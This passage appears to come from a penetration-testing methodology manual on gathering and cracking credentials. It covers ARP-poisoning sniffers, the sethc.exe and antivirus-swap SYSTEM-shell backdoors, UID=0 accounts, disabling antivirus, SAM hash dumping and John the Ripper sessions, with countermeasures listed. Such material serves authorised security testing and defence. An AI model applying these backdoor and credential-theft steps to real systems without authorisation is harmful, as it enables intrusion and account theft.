algorithm used and the quality of the password.
Page 277 of 1123
C.5.6 Countermeasure(s)
•
Block ALL services that don't need external (Internet) access at the border
firewall
•
Verify that all SQL aware web applications are not vulnerable to SQL injection.
•
Verify that names.nsf in a Lotus Domino server can't be accessed remotely using
the anonymous account (it's better if it's not possible to do that at all).
•
Verify that files starting with dot can't be accessed remotely in Apache servers.
Also ensure that the .passwd file is outside the web root directory.
•
Verify that all default community names have been changed. It's better to block
SNMP access from the Internet at the border firewall.
•
Verify that all unused services (for example finger) have been deactivated and/or
blocked at the border firewall.
•
Audit the source code of HTML pages to remove any compromising information.
•
Audit all passwords used by Internet-exposed applications.
C.5.7 Further Reading (Links)
C.5.8 Contributor(s)
Page 278 of 1123
C.6 STEP TWO: NETWORK AUTHENTICATION CREDENTIALS GATHERING
AS AN INSIDER PENETRATION TESTER (LOW PRIVILEGE)
C.6.1 Description
If the main concern are people with some kind of internal access, that can range from
visitors carrying a laptop with no accounts in the internal system, to employees with low
or entry level of access.
There’s no point in trying to do a penetration testing if the privileges are already high,
because in this case the intruder will have access to almost anything. In this case refer
to Step Five.
C.6.2 Objective
Describe the process of obtaining different types of commonly used passwords, from the
perspective of an insider with low privileges in the system.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.6.3 Expected Results
Only in exceptional cases the internal security of an organization can cope with an
insider. It's very common practice to secure only the perimeter of the network, relying on
the use of passwords at the internal level.
In most cases the insider will be able to gather information from the network using
packet sniffers, including password exchanges that, even when encrypted, are good
candidates for future cracking.
C.6.4 Process (Steps to complete this task)
All the examples mentioned in Step One are valid, with the additional advantage that it's
very unlikely that the firewall(s) and ACL(s) are restricting access for internal personnel.
Page 279 of 1123
Being connected to the internal network, one of the best choices is to use a packet
sniffer to gather information from the network.
The issues to solve in order to use a sniffer are:
a) they need administrative privileges in order to put the NIC in promiscuous mode
b) the network will most likely be a switched environment, in order to capture
exchanges from/to machines other than the insider's, some extra techniques
have to be used
Point (a) is in fact the less restrictive, because the insider can boot another OS like
Knoppix from a CD or a Linux mini-distribution from floppy, thus having administrative
access and the needed tools available.
Point (b) can be overcome with the use of the "ARP poisoning" technique, consisting in
tampering with the ARP tables in the switches to redirect all traffic from/to a given host
(or all the network) to the insider's machine, capture it, and send it to the real destination.
From the network captures the passwords, encrypted passwords, hashes, or
authentication exchanges can be isolated for future cracking.
C.6.5 Example uses of common testing tool(s)
One of the best multipurpose sniffers available is Ethereal (www.ethereal.com), available
for many OSs (Windows, UNIX and Linux version are available), and as a GUI or CLI
application (in the later case it's name is tethereal).
Ethereal doesn't incorporate any functionality to do ARP poisoning to re-route traffic
through the attacker's system, so an external tool has to be used for that purpose.
Other interesting sniffer is Dsniff by Dug Song (www.monkey.org/~dugsong/dsniff/) that
incorporates both the possibility to do ARP poisoning and some pre-made filters to
capture some passwords.
If an external tool is needed to do ARP poisoning, Arp0c from Phenoelit
(www.phenoelit.de/arpoc/), the successor of WCI, is one of the best tools available.
Page 280 of 1123
In any case where ARP poisoning is required, it's important to verify that no loss of
connectivity was caused in the network. Some network switches provide the functionality
to stop all traffic if an attempt to do ARP poisoning is detected (basically, if a forceful
attempt to modify the cached ARP tables is detected from a different MAC address).
Very few networks incorporate this functionality, but it's important to be aware of it, and
to consider the possibility of using it within the organization.
Some switches can be also configured to avoid forceful changes to the cached ARP
tables, thus making impossible ARP poisoning. In such systems, a small packet flood
(DoS attack) can be tried against the switch, because such switches tend to fail back to
act as simple repeaters (hubs) if they can't cope with the ARP table updating. As in the
paragraph above, it's important to verify that there is no loss of network connectivity.
C.6.6 Result Analysis / Conclusion / Observation
Seldom is a company's network not vulnerable to ARP spoofing, and very few of them
have sniffer detection in place, so for the insider trying to gather authentication
credentials from the network with the use of sniffers is one of the main ways of attack.
Page 281 of 1123
C.6.7 Countermeasure(s)
Implement internal firewalls to segregate network segments that don't require
interconnection.
Implement at least IP based ACLs (best if combined with user based ACLs) to avoid
spurious connections to systems in need of protection.
Use switched networks.
Try to implement that using switches that can be configured to avoid ARP poisoning as
much as possible (balance the equation: if someone attempts ARP poisoning this can
lead to major network connectivity disruption).
Use network sniffer detection tools, like AntiSniff (readily available on the Internet).
These tools are not 100% fail-proof (a one-way network tap will easily avoid them) but
it's better than nothing.
Disable the possibility to boot to an alternate operating system in the machines you
control (by changing the BIOS setup and protecting it with a password, or what is better,
by removing all bootable devices like floppy drive and CDROM reader). This way you
can still be attacked by someone who carries his/her own laptop, but this is easier to
avoid by physical access control to the facilities.
Always consider that someone inside your organization *can* get your authentication
credentials from the network, so try to minimize the impact using quality passwords and
good encryption.
C.6.8 Further Reading (Links)
C.6.9 Contributor(s)
Page 282 of 1123
C.7 STEP THREE: LOCAL HOST AUTHENTICATION CREDENTIALS
GATHERING AS AN INSIDER PENETRATION TESTER (LOW PRIVILEGE)
C.7.1 Description
In general when someone has physical access to the local host the game is over,
because there is usually one or more ways to get all information from the system.
This section applies mostly to employees who want to gather local authentication
credentials for some reason, but don't have any administrative rights for the local
machine.
C.7.2 Objective
Describe the process of obtaining different types of commonly used passwords from the
local machine, from the perspective of an insider with low privileges in the system.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.7.3 Expected Results
Any skilled individual should be able to raise his/her privileges in the local system to an
administrative level. After that gathering local authentication credentials is very easy in
most cases.
C.7.4 Process (Steps to complete this task)
The first step to consider is checking if there are any stored passwords, usually obscured
by asterisks (or circles in Windows XP) that can be revealed using password reveal
tools.
Other than the above, the attacker can try to raise privileges to administrative
(Administrator, root, SYSTEM) level. This will vary depending on the operative system.
If everything else fails, the attacker can still try to exploit any local vulnerabilities
identified in the system.
Page 283 of 1123
C.7.5 Example uses of common testing tool(s)
For
password
revealing
in
Windows
systems,
tools
like
Revelation
(http://www.snadboy.com/) can prove useful, but my preferred one is VeoVeo, a Spanish
tool available at http://www.hackindex.org/download/veoveo.zip (the website is in
Spanish, I recommend you to read it).
The tool needs no administrative privileges to be installed, just unzip it in any directory,
but be sure to have the .exe and the .dll in the same directory.
When started it will be show in your tray (it's the leftmost one, marked in red): It can be
accessed with the right mouse button, and you'll see the following options:
Visualizar Password
Activar Botones (manual)
Activar Botones (automatico)
---------------------------Activar Menus
---------------------------Activar Keylogger
---------------------------Acerca de
---------------------------Salir
"Visualizar Password" has the functionality to reveal passwords obscured by asterisks.
"Activar Botones (manual)" will send a single message to activate all greyed controls.
In some cases the program greys the controls again every 1/nth of a second, in that
case you can use "Activar Botones (automatico)" that will keep sending the message to
reactivate the greyed controls until deselected.
"Activar Menus", that doesn't work all the time or with all applications, activates greyed
menu items.
Page 284 of 1123
"Activar Keylogger" activates a simple keylogger. In the Spanish text that comes with
VeoVeo there's an explanation of that functionality.
"Acerca de" has the "About…" functionality.
"Salir" means "Exit". This closes the application.
If your problem are the nasty circles that obscure passwords in Windows XP, you can
give iOpus Password Recovery a try (http://www.iopus.com/password_recovery.htm).
The next step could be escalate privileges into the system.
In most cases you can boot to an alternative OS, like a Knoppix CDROM, and just grab
important system files that can provide authentication credentials. Typical examples are
the /etc/secrets in a Linux system or the sam file in a Windows machine.
However, I usually found it easier just to modify the system to allow me a backdoor with
administrative privileges.
If the system is a Windows box, it's very likely that it will be running an antivirus program,
the antivirus will typically have SYSTEM access rights, in order to be able to scan all files
in the system.
With the system running, you can take note of the name of the antivirus program (i.e. the
process that's running), boot into an alternative OS that allows you to write to the local
system (like NTFSDOS Pro to access NTFS partitions), make a backup of the
executable of the antivirus and put a copy of cmd.exe with the same name and in the
same location as the old (replaced) antivirus executable.
Upon booting the system, instead of the antivirus a SYSTEM CLI will be started.
I found also handy doing this trick to sethc.exe in my Windows XP system with the
Accessibility Tools installed, thus having the possibility to start a SYSTEM CLI before
Page 285 of 1123
login simply pressing SHIFT five times (if you do it after login, the CLI will start within
your user account).
If the system is a Linux box, you can still create a bogus account with UID=0 (thus a root
equivalent), and su to that account after your normal login. You can put a pre-encrypted
password to that account if you want, or change it after su'ing. (All this can be a little
pointless in a Linux box if you're only interested in the /etc/secrets).
After gaining administrative access level, the next step in a Windows box can be to
dump hashes from the sam, this can be done with tools like pwdump2 or pwdump4 in
local mode. Other tools exists for the same purpose.
If it's not possible to tamper the system and no useful information was obtained by
password revealing, it's still possible to try to identify a local vulnerability and use the
proper exploit. An example of that could be RunAs from DebPloit. Take into account that
many of these exploits are detected as malware by most antivirus programs, so you
have to deactivate them first (I found it trivial to deactivate products like McAfee 4.x
using the "Activar Botones" functionality of VeoVeo. Just experiment a bit).
C.7.6 Result Analysis / Conclusion / Observation
Having local access to a system, even with low privileges, usually means that escalation
of privileges and authentication credentials gathering is possible.
C.7.7 Countermeasure(s)
Avoid at all cost the possibility to boot to an alternate operative system.
Provide antivirus and keep it up to date. Verify that is not feasible to deactivate it with
such tools as VeoVeo.
Verify that any application that stores passwords and shows it hidden by asterisks or
circles is not storing the real password there, but a bogus character string.
Page 286 of 1123
C.7.8 Further Reading (Links)
C.7.9 Contributor(s)
Page 287 of 1123
C.8 STEP FOUR: NETWORK AUTHENTICATION CREDENTIALS GATHERING
AS AN OUTSIDER ADMINISTRATOR (HIGH PRIVILEGE)
C.8.1 Description
In this scenario most likely the "attacker" is an auditor, that already has some kind of
administrative access level to the remote system.
Except with the possible case of SSH connections, the administrative access is to some
kind of control or configuration tool (for servers, routers, etc.), that doesn't allow direct
command execution.
Due to the remote nature of the attack, the use of sniffers is not feasible.
C.8.2 Objective
To gather any available credentials for the remote control/configuration tool.
To obtain command execution rights in the remote system, in order to implement all the
techniques described so far.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.8.3 Expected Results
In the case where no command execution rights can be obtained, it's very likely that
authentication credentials for the control/configuration tool can be obtained, either by its
normal functionality or exploiting some bug of it or the underlying platform (for example
the web server).
If command execution rights can be obtained (or are readily available) in the remote
system, all techniques mentioned in the preceding sections can be applied, and at least
the local authentication credentials will be obtained.
Page 288 of 1123
C.8.4 Process (Steps to complete this task)
The process will vary depending on the type of remote access.
If it consists of SSH or similar access with command execution capabilities to the remote
system, for all purposes it can be considered local access with administrative privileges.
Dumping or copying of local authentication credentials, installation of sniffers, and other
techniques mentioned before will be applied.
If the only access available is to the CLI, and for some reason GUI access is needed,
VNC (Virtual Network Computing, from http://www.realvnc.com/) can be installed.
If the remote access consists of some control/configuration tool that has indirect
command execution capabilities like Webmin (http://www.webmin.com/), a shell can be
connected back to the attacker's system using Netcat, this process is called "Shell
Shovelling". The details of establishing such a connection are out of the scope of this
section (details to be found in the relevant section of ISSAF, or the Internet).
If the remote access doesn't provide any way to execute commands, the first step could
be to check if in its configuration the credentials for other accounts can be obtained. This
will depend on the specific configuration/control tool, but it's very unlikely that they will
disclose credentials, even to administrators that can change passwords and add/remove
users.
One possibility to explore are any know vulnerabilities to the configuration/control tool.
Dig SecurityFocus (http://www.securityfocus.com/) for those.
If there are no vulnerabilities shown in SecurityFocus, or the tool is not mention, some
basic tricks like trying to pass invalid parameters, wrong URLs (if the tool is web-based),
etc., can sometimes disclose some information from the system, like paths or location of
components. If this is feasible, and knowing the internal details of the tool, it could be
possible to get access to any file or database where the authentication credentials are
stored.
Page 289 of 1123
In some strange cases, the above tricks allow command execution (for example pointing
an URL to the command to execute, see examples of command execution using the old
IIS Unicode vulnerability to get the idea).
As a side note, in some cases, if user creation rights are available and the encryption
used by the application is known, a bogus user can be created with a know password,
and carry a search (as far as possible) for the encrypted string corresponding to that
password in order to locate the credentials storage.
C.8.5 Example uses of common testing tool(s)
Other than the tools to use after getting CLI access to the remote system, there are no
specific tools except the one(s) used to connect to the remote configuration/control
application.
In the case of web access to the application, sometimes is useful to try some kind of
intercept
proxy
like
Achilles
(Windows)
or
Paros
(http://www.proofsecure.com/index.shtml/ for Windows and Linux versions).
C.8.6 Result Analysis / Conclusion / Observation
Given the possibility of command execution, authentication credentials will be gathered
at least from the local system.
If no command execution is possible, it will be still possible in some cases to gather
some authentication credentials if the remote control/configuration application is not well
coded/configured.
Page 290 of 1123
C.8.7 Countermeasure(s)
Implement remote control/configuration applications when they are really needed.
Try to use an application that doesn't allow command execution, or disable it if possible.
Implement a firewall (if possible) that allows connection to that application only from
selected locations.
If possible use certificates for authentication. If only passwords can be used, implement
a strong policy for secure passwords.
If One-Time-Passwords can be used, these are preferred to normal passwords.
Verify the integrity of the remote control/configuration application. It has to behave well
under error conditions, attempts to feed bogus data and/or hand crafted URLs (for web
based applications).
C.8.8 Further Reading (Links)
C.8.9 Contributor(s)
Page 291 of 1123
C.9 STEP FIVE: NETWORK AUTHENTICATION CREDENTIALS GATHERING AS
AN INSIDER ADMINISTRATOR (HIGH PRIVILEGE)
C.9.1 Description
This scenario allows total control of the network at a LAN level.
Basically that means that the attacker or audit can apply ALL techniques described
before (including network sniffer installation) to gather authentication credentials with a
very high success ratio.
C.9.2 Objective
To gather any available credentials from the network and servers.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.9.3 Expected Results
The attacker having administrative privileges at the enterprise level, nothing can stop
him/her from collecting all authentication credentials available, so special care has to be
taken to avoid storage of plain or encrypted authentication credentials.
C.9.4 Process (Steps to complete this task)
All the techniques described before.
C.9.5 Example uses of common testing tool(s)
See sections one to four.
C.9.6 Result Analysis / Conclusion / Observation
Credentials will be collected except in the following cases:
a) certificates are used for authentication (assuming that the Certification Authority
is safe from the attack)
Page 292 of 1123
b) one-time-passwords are in use (the credentials can still be gathered, but are
useless)
c) the authentication and/or encryption in use is not known. This will "protect" the
specific system/application only until the time this becomes public knowledge
Page 293 of 1123
C.9.7 Countermeasure(s)
All the countermeasures mentioned so far, with the following recommendations:
•
Implement network encryption.
•
Implement packet signing in Windows networks to avoid packet injection.
•
Use certificates for authentication and be sure that the CA is not reachable in the
network (should be totally offline, and any accounts there must be different than
the ones used in the enterprise network).
•
Avoid security through obscurity (point c in the section "Results…" above)
because it will provide only temporary security. If when the details become public
it proves to be unsafe, much more resources will have to be spend than if a good
secure product was chosen from the beginning.
C.9.8 Further Reading (Links)
C.9.9 Contributor(s)
Page 294 of 1123
C.10 STEP SIX: LOCAL HOST AUTHENTICATION CREDENTIALS GATHERING
AS AN ADMINISTRATOR (HIGH PRIVILEGE)
C.10.1
Description
This case is for authentication credentials gathering on the local host, having
administrative privileges. Nothing can stop the attacker/auditor from gaining all the
available credentials on the system.
C.10.2
Objective
To gather any available credentials from the network and servers.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.10.3
Expected Results
The attacker having administrative privileges at the local host level, nothing can stop
him/her from collecting all authentication credentials available, so special care has to be
taken to avoid storage of plain or encrypted authentication credentials.
C.10.4
Process (Steps to complete this task)
See steps three and five. Nothing will stop you from using all techniques described so
far.
C.10.5
Example uses of common testing tool(s)
See all techniques and tools described above.
C.10.6
Result Analysis / Conclusion / Observation
Credentials will be collected except in the following cases:
•
certificates are used for authentication (assuming that the Certification Authority
is safe from the attack)
Page 295 of 1123
•
one-time-passwords are in use (the credentials can still be gathered, but are
useless)
•
the authentication and/or encryption in use is not known. This will "protect" the
specific system/application only until the time this becomes public knowledge
Page 296 of 1123
C.10.7
Countermeasure(s)
All the countermeasures mentioned so far, with the following recommendations:
•
Implement some kind of hard disk or file encryption for critical information that
has to belong to a given user, that can't be overridden by the administrator. In
such cases it's vital to keep offline the credentials needed for decryption of the
information or use certificate based encryption (with a secure CA).
•
Use certificates for authentication and be sure that the CA is not reachable in the
network (should be totally offline, and any accounts there must be different than
the ones used in the enterprise network).
•
Avoid security through obscurity (point c in the section "Results…" in point five)
because it will provide only temporary security. If when the details become public
it proves to be unsafe, much more resources will have to be spend than if a good
secure product was chosen from the beginning.
C.10.8
Further Reading (Links)
C.10.9
Contributor(s)
Page 297 of 1123
C.10.10
SECOND
CRACKING
C.10.11
PART:
ENCRYPTED/HASHED
PASSWORD
Background I: encrypting, hashing, salting
Encryption is the process of changing a plain text into a cipher text, and usually means
that the process can be reversed (if you apply all mathematical or logical operations in
reverse order you can obtain the plain text for a given cipher text).
Password crackers can implement decryption when encryption is in use and the
algorithm is known.
Hashing is the process to mathematically obtain a digest from a given plain text, and
means that it's mathematically unfeasible to obtain the plain text for a given cipher text.
Password crackers overcome that difficulty by hashing a big set of plain text words or
sequences of characters, and comparing the hash obtained with the cipher text. When a
match is found the plain text password has been found, or at least another plain text that
produces the same hash (mathematically possible, but very hard). In this last case the
result is the same, the text obtained will work as the password.
Salting is the process to add one or more random components to a given plain text
during the encryption or hashing process, thus making it more difficult to recover the
plain text by either of the ways described above.
If an algorithm doesn't incorporate salt, a given plain text will produce always the same
cipher text.
If an algorithm incorporates salt, a given plain text will produce several different cipher
text variants, depending on the randomness of the salt added.
A good example of use of salt are the Linux passwords.
In the past such passwords were encrypted using DES, and this was strong enough at
this time, but with the advent of more powerful systems the cracking of DES became
feasible, thus a new algorithm was put in place by the shadow package in Linux
systems.
The new algorithm is a salted variation of MD5 (plus a small encoding at the end), so for
each plain text you can obtain 1024 (depending on the implementation) different cipher
texts.
Page 298 of 1123
Adding this complexity factor of 1024 to the fact that the encryption "per se" is stronger
(MD5) is much more harder to "crack" (in fact recover) Linux passwords.
The term "cracking" is incorrect in the case of hash recovery, but it's widely used.
Page 299 of 1123
C.10.12
Background
algorithms
II:
algorithms,
public
and
proprietary
As mentioned earlier in this chapter, many different encryption and hashing algorithms
are in use. It's important to know which algorithm has been used for a given password in
order to identify the proper cracking tool.
If you know from which application/system that cipher text came in the first place, usually
you can dig information about the algorithm used in the Internet or documentation of the
application/system itself.
Many of such algorithms are described in RFC (Request For Comments) or STD
(STandarDs) documents, available at http://www.rfc-editor.org/
If an algorithm has been published, scrutinized, and attacked for some time, and proven
solid, it's a good choice for our encryption.
If an algorithm is proprietary, we only have the claims from the vendor about its security.
Until someone breaks it and people starts to massively attack it, we don't know anything
about its real security. If there are public algorithms in use those are preferred to
proprietary ones.
An example of a proprietary algorithm that was broken almost immediately after being
put in use, and proved to be weak, was the DVD encryption.
Another good example is the Domino R4 HTTP password hashing algorithm. Its "secret"
was closely guarded by Lotus until Jeff Fay and some collaborators manage to break it
(now it's implemented in Lepton's Crack). That algorithm produces an unsalted hash, so
a given plain text password produces always the same hash, speeding up the process
and making rainbow table creation attractive.
Page 300 of 1123
C.10.13
Background III: Rainbow Tables and Rainbow Cracking
A very long time ago someone came with the concept of pre-computing all given cipher
texts for all possible plain texts (for a given algorithm, of course). This way a table with
all plain texts and their corresponding cipher texts can be generated, such a table is
named a "Rainbow Table".
Having such a table you don't need to create hashes again during the password cracking
process, it's enough to parse the table looking for any given cipher text, and when found
read the next column to see what is the plain text associated with that. This process is
known as "Rainbow Cracking".
Rainbow table generation and rainbow cracking is feasible with today's hardware for
algorithms that don't use salt (due to storage space limitations for the table) and up to a
certain length only.
A good candidate for such approach is the old Windows LM algorithm, because it uses
only a subset of all ASCII characters (no lowercase letters, not all symbols allowed,
Unicode is possible but hardly used in western countries) with a maximum length of 7.
Even that "small" subset will produce a table of more than 100 GB, and will take weeks
to complete, but the rainbow cracking after table creation will take only a very small
percentage of that time to recover ANY password.
C.10.14
Description
This section describes the process to identify (when possible) the encryption/hashing
algorithm used to secure the passwords, and the use of common password cracking
tools to obtain the plain text passwords.
C.10.15
Objective
To obtain the plain text passwords from their corresponding encrypted/hashed
equivalents.
To explain the use of common password cracking tools.
Page 301 of 1123
To explain the rainbow table concept and its implementation with common tools.
C.10.16
Expected Results
Due to the attack on the encrypted/hashed passwords being off-line, no particular
restrictions are expected to be found.
Given a know encryption/hashing algorithm, any simple passwords will fall to attack.
Complex passwords could potentially take a prohibitive time to be obtained, so the use
of rainbow tables will be explained for these.
At the end, is expected that a good percentage of user passwords and some
administrative (probably good) passwords will be recovered.
C.10.17
Process (Steps to complete this task)
The steps to follow are:
•
Select the proper password cracking tool based on the encryption/hashing
algorithm in use.
•
Organize the combination userID + encrypted/hashed password in a format
suitable for the password cracking tool to be used.
•
If rainbow tables are not available, use a comprehensive dictionary attack on the
encrypted/hashed password list.
•
If rainbow tables are not available, define the scope of a bruteforce attack and
implement it.
•
Do a rainbow table lookup for the encrypted/hashed passwords.
C.10.18
Example uses of common testing tool(s)
Some common password cracking tools are:
•
LC5 (http://www.atstake.com/products/lc/)
o
Runs on Windows only
o
Supports LM and NTLM hashes (Windows), including rainbow tables.
o
Supports Unix hashes, but no rainbow table support for that.
o
Supports dictionary, "hybrid mode" and bruteforce attacks
Page 302 of 1123
o
Has rainbow table support
o
The charset to use for the password is configurable
o
It has network sniffing functionality and SAM dumping
o
Has some other enterprise related functionalities
o
The main advantage of this tool are the commercial support and the
easiness of use
•
Cain (http://www.oxid.it/cain.html)
o
Runs on Windows only
o
Supports Win 9x .pwl files, Windows LM, NTLM and NTLMv2 hashes,
Cisco IOS MD5 hashes, Cisco PIX MD5 hashes, APOP MD5 hashes,
CRAM MD5 hashes, OSPF MD5 hashes, RIPv2 MD5 hashes, VRRP
HMAC hashes, VNC 3DES passwords, pure MD2 hashes, pure MD4
hashes, pure MD5 hashes, pure SHA1 hashes, RIPEMD-160 hashes,
Kerberos 5 pre authentication hashes, Radius Key hashes, IKE-PSK
hashes, MS-SQL hashes and MySQL hashes
o
Supports dictionary and bruteforce attacks
o
Supports rainbow tables in some algorithms, and for a single account at a
time
o
The charset to use for the password is configurable
o
It has network sniffing functionality and SAM dumping
o
Has several other functions other than password cracking
o
The
main
advantages
of
this
tool
are
the
huge
amount
of
encrypted/hashed passwords supported, the extra functionalities not
related to password cracking and the cost (free)
•
John the Ripper (http://www.openwall.com/john/)
o
Runs on DOS, Windows and Linux (or any UNIX-ish system)
o
Supports traditional DES, BSDI DES, FreeBSD MD5, OpenBSD Blowfish,
Kerberos AFS DES and Windows LM by default.
o
Patches available to support OpenVMS passwords, Windows NTLM, AFS
Kerberos v4, S/Key keyfiles, Netscape LDAP server passwords and
MySQL passwords. Applying a single patch is easy, applying more than
one get more and more complex because you can't simple use the patch
command.
Page 303 of 1123
o
Supports dictionary, "word mangling" and incremental (bruteforce) modes.
These modes made John a very powerful tool
o
The charset to use for the password is configurable
o
The main advantages of this tool are bruteforce speed, the powerful word
mangling mode and the fact that is free open source software
•
Lepton's Crack (http://freshmeat.net/projects/lcrack/)
o
Runs on DOS and Windows if compiled under Cygwin, MingW or Visual
C, and Linux (or any UNIX-ish system)
o
Supports Domino R4 hashes, pure MD4 hashes, pure MD5 hashes,
NTLM (Unicode MD4), pure SHA1 hashes and Windows LM hashes by
default.
o
Plans are in place to add support for Domino R5 hashes and Oracle
passwords.
o
Supports login mode (tries combinations of the userid), dictionary, "smart
dictionary mode" and bruteforce attacks
o
It has REGEX support. This is one of the most interesting functionalities
of this tool, that makes it very powerful
o
In REGEX mode (and also for the charset) the characters to use can be
indicated directly by the character, or as an hex, octal or decimal number
o
The charset to use for the password is configurable
o
Both commonly used charsets and REGEX expressions can be stored in
text files, and these referenced when the tool is used
o
Has an external program to generate rainbow tables in the supported
algorithms
o
Has rainbow table support
o
The main advantages of this tool are the REGEX mode, support for
Domino R4 hashes and the fact that is free open source software
There is plenty of other tools out there, some of them for several encryption/hashing
algorithms, some only for one. Every one of them has advantages and disadvantages,
so try them and get familiar with the most useful ones for you.
Page 304 of 1123
C.10.19
Use of LC5
LC5 is a commercial product you can purchase from AtStake.
They'll issue you a registration key.
The installation is the typical point-and-click one for Windows software. You need
administrative privileges to install the tool, but not to use it (except for network sniffing
and SAM dumping).
{FIXME: someone put examples of LC5, I haven't used LC for years!}
Page 305 of 1123
C.10.20
Use of Cain
Cain is a free product you can download from www.oxid.it
The installation is quite straightforward, you need administrative privileges to install the
tool and to use it (it refuses to start if you are a normal user).
Here is a screenshot of Cain, as show when you start it and open the "Help"->"About…"
menu item:
Every section of the program is accessed with the tabs on top. There's a tab named
"Cracker" that will bring you to the password cracking section:
Page 306 of 1123
On the left side you've all the supported algorithms. If you select any, the right side of the
screen will adjust the columns to the ones relevant for that algorithm. In the example
above the columns for LM & NTLM hashes is shown.
If you click with the right mouse button on the right side of the screen, you'll get a floating
menu similar to this one (the particular one will depend on the algorithm selected on the
left):
Page 307 of 1123
In this example of LM&NTLM, the next step will be to "Add to list" some hashes.
This option brings in the following requester:
That allows you to dump the local hashes or to import from a text or SAM file.
If dumping the local hashes:
Page 308 of 1123
(Note that the Guest account has an empty password, both LM and NTLM).
If adding from a file, Cain expects either a SAM file, or a text file with the following format
(remember that this is specific for our LM & NTLM example):
USERID:{anything}:{anything}:LM_HASH:NTLM_HASH
If you try to add something like "userid:LM_hash:NTLM_hash" it will fail, so adjust your
input file accordingly.
Once some hashes have been added, we can right click on the right side of the screen
again, and use several options, like "Dictionary Attack" or "Bruteforce Attack" on all
passwords, or select a single account to highlight options to attack only this one by
"Dictionary Attack", "Bruteforce Attack", "Cryptanalysis Attack" (that's nothing more than
rainbow tables use), and also the possibility to "Test Password" that allows to try a single
given password and see if we unlock the account (icon changes to ring of keys) or not
(icon changes to a padlock).
This tool is not amazingly fast, but its versatility and ease of use make it particularly
interesting.
Page 309 of 1123
Page 310 of 1123
C.10.21
Use of John the Ripper
John the Ripper is a free open source product you can download from
www.openwall.com
You can get the source code for the latest development version (highly recommended
due to speed improvements), or the source code for v1.6 and executables for this
version for DOS and Windows.
In order to compile John the Ripper from source you can use Linux or Cygwin
(www.cygwin.com) for Windows.
If you are going to compile the latest development version, take the extra effort to
manually apply at least the Windows NTLM patch. It won't be possible to simply use the
patch command from the diff file provided, but it's not hard to apply it manually, just see
the diff file for the sections of code above and below the modifications, and
insert/remove that code accordingly.
The latest development version doesn't have any documentation or charset files, you
can get these from version 1.6 if you want.
This is an example of what I can see when I execute v1.6.37 patched with NTLM support
compiled with Cygwin:
N:\cygwin\usr\local\john-1.6.37-NT\run>john
John the Ripper password cracker, version 1.6.37
Copyright (c) 1996-2004 by Solar Designer and others
Homepage: http://www.openwall.com/john/
Usage: john [OPTIONS] [PASSWORD-FILES]
--single
"single crack" mode
--wordlist=FILE --stdin
--rules
wordlist mode, read words from FILE or stdin
enable word mangling rules for wordlist mode
--incremental[=MODE]
"incremental" mode [using section MODE]
--external=MODE
external mode or word filter
--stdout[=LENGTH]
just output candidate passwords [cut at LENGTH]
--restore[=NAME]
restore an interrupted session [called NAME]
--session=NAME
give a new session the NAME
Page 311 of 1123
--status[=NAME]
print status of a session [called NAME]
--make-charset=FILE
--show
--test
make a charset, FILE will be overwritten
show cracked passwords
perform a benchmark
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..]
load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]
load users with[out] this (these) shell(s) only
--salts=[-]COUNT
load salts with[out] at least COUNT passwords only
--format=NAME
force ciphertext format NAME: (DES/BSDI/MD5/BF/AFS/LM
/NT)
--save-memory=LEVEL
enable memory saving, at LEVEL 1..3
The format of the encrypted/hashed password file expected by John is as follows:
USERID:PASSWORD
Or any valid Linux/UNIX password file. John is flexible enough to parse these, and even
uses the GECOS information (if present) in the "single crack" mode.
Page 312 of 1123
Without going into the all the gory details, you can start a wordlist attack (the simplest
mode) by:
N:\cygwin\usr\local\john-1.6.37-NT\run>john --format=LM --wordlist=password.lst
crackmeLM.txt
Loaded 4 password hashes with no different salts (NT LM DES [64/64 BS MMX])
guesses: 0 time: 0:00:00:00 100% c/s: 915200 trying: TAFFY - ZHONGGU
Note that we specify:
--format=LM
we are using LM algorithm
--wordlist=password.lst
we use the file password.lst as our dictionary
crackmeLM.txt
the file with the passwords to crack
It's always a good idea to specify the format, but it's supposed that John can figure it out
in some cases (for example if you provide a typical Linux password file for cracking).
The "single crack" mode will take a full password file from a Linux system, and use any
information available in the GECOS field as input to generate possible passwords.
An explanation of the GECOS field taken from the Perl documentation reads:
"Interpretation of the gecos field varies between systems, but traditionally holds 4
comma-separated fields containing the user's full name, office location, work phone
number, and home phone number. An & in the gecos field should be replaced by the
user's
properly
capitalized
login
name."
–
Source:
http://www.perldoc.com/perl5.6/lib/User/pwent.html
It's always a good idea NOT to store information in the GECOS field if it can be avoided.
The incremental mode, that tries to bruteforce a password using all possible character
combinations for the given charset, it's the most powerful mode in John. It can
theoretically recover ANY password, but the time needed to do that can be measured in
years for a combination of strong password + strong encryption/hashing algorithm.
To start an incremental attack:
Page 313 of 1123
N:\cygwin\usr\local\john-1.6.37-NT\run>john --format=LM --incremental crackmeLM.
txt
Loaded 4 password hashes with no different salts (NT LM DES [64/64 BS MMX])
5TP
(Administrator:2)
guesses: 1 time: 0:00:00:06 c/s: 3228967 trying: HMMROV - 193M
Session aborted
In the example above the second half of the Administrator LM hash was recovered: 5TP
Any passwords (or half passwords for LM) are stored in the john.pot file, as seen here:
N:\cygwin\usr\local\john-1.6.37-NT\run>type john.pot
$LM$8ECD8FBB017982DC:5TP
This is used in subsequent sessions to avoid cracking these hashes again. It's expected
that john.pot will grow over time, providing a source of common passwords.
John provided a powerful "word mangling" functionality, that tries not only the words
provided in a dictionary when using wordlist attack, but also some additions and
permutations on these. This is controlled by the john.conf file.
Examples are:
•
Replacing letters by numbers to use 31337 (elite ;-) jargon:
Password -> P4ssw0rd
•
Case permutation:
Password -> PASSword
•
(256 possible permutations)
Prefixing / Suffixing:
Password -> 1Password
Password -> Password2
And many other possible combinations and permutations.
The suggested use for John the Ripper is to create a very big, comprehensive, and
sorted dictionary, and do wordlist attack first. This will recover all the easy passwords
and some complex ones.
Page 314 of 1123
Then an incremental attack can be done, and interrupted if it takes too long to make
sense.
With John you can interrupt a session and continue it later:
N:\cygwin\usr\local\john-1.6.37-NT\run>john --restore
Loaded 3 password hashes with no different salts (NT LM DES [64/64 BS MMX])
guesses: 1 time: 0:00:00:11 c/s: 4610955 trying: MCLPOU - MCC17H
Session aborted
